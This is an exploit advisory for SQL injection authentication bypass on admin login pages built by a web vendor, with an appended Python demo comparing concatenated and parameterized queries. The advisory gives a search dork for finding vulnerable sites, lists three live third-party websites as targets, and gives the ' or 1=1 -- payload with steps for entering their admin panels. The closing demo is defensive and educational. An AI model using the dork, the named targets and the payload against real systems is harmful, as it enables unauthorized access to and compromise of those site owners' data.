TITLE: Techbrightsolutions - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: TechbrightSolutions
# Vulnerable URL: /Admin/login.aspx
# Dork: "by TechbrightSolutions" "login"
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
During a recent penetration test conducted by TechbrightSolutions, a critical SQL injection vulnerability was discovered in the Admin Panel login functionality of TechbrightSolutions' application code. The vulnerability allows an attacker to bypass authentication controls and execute arbitrary SQL queries, potentially leading to unauthorized access and data compromise.
Proof of Concept (PoC):
URLs:
- http://kolencheryfamilytrust.org/Admin/login.aspx
- http://vivacards.in/Admin/AdminLogin.aspx
- https://globaljobs24.com/AdminLogin.aspx
1. Visit the admin login page, typically located at: http://kolencheryfamilytrust.org/Admin/login.aspx
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
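Added example (not part of the original advisory and not the vendor's code): a local model of why the step 2 string passes a login check built by string concatenation, and how a parameterized query rejects it. The in-memory SQLite database, the admins table, its columns and the sample account are assumptions constructed for the demonstration; the affected application's real query is not shown on this page.

```python
import hashlib
import sqlite3

DEMO_SALT = b"constructed-demo-salt"  # constructed; real code uses a per-user salt

def digest(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 10_000).hex()

def make_db():
    # Constructed schema and account; the real application's tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)", ("admin", digest("S3cret!")))
    return db

def login_concatenated(db, username, password):
    # Vulnerable pattern: user input becomes part of the SQL text, so a quote
    # closes the string literal and "--" comments out the password condition.
    sql = ("SELECT COUNT(*) FROM admins WHERE username = '" + username +
           "' AND pw_hash = '" + digest(password) + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    # Hardened pattern: input is bound as data and never parsed as SQL.
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND pw_hash = ?"
    return db.execute(sql, (username, digest(password))).fetchone()[0] > 0

def compare(username, password):
    # Returns (result of concatenated check, result of parameterized check).
    db = make_db()
    return (login_concatenated(db, username, password),
            login_parameterized(db, username, password))

if __name__ == "__main__":
    payload = "' or 1=1 --"  # the string from step 2 of the PoC
    for user, pw in [("admin", "S3cret!"), ("admin", "wrong"), (payload, payload)]:
        print(repr(user), compare(user, pw))
```

The two checks agree on valid and invalid credentials and differ only on the step 2 string, which the concatenated query accepts and the parameterized query rejects.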
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Contact
Telegram: @rootninext